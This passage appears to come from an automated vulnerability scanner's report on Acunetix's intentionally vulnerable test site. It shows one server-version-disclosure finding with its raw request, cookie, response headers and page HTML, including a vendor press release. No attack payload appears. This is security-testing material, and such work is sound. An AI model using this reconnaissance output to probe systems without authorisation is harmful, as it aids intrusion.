style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" 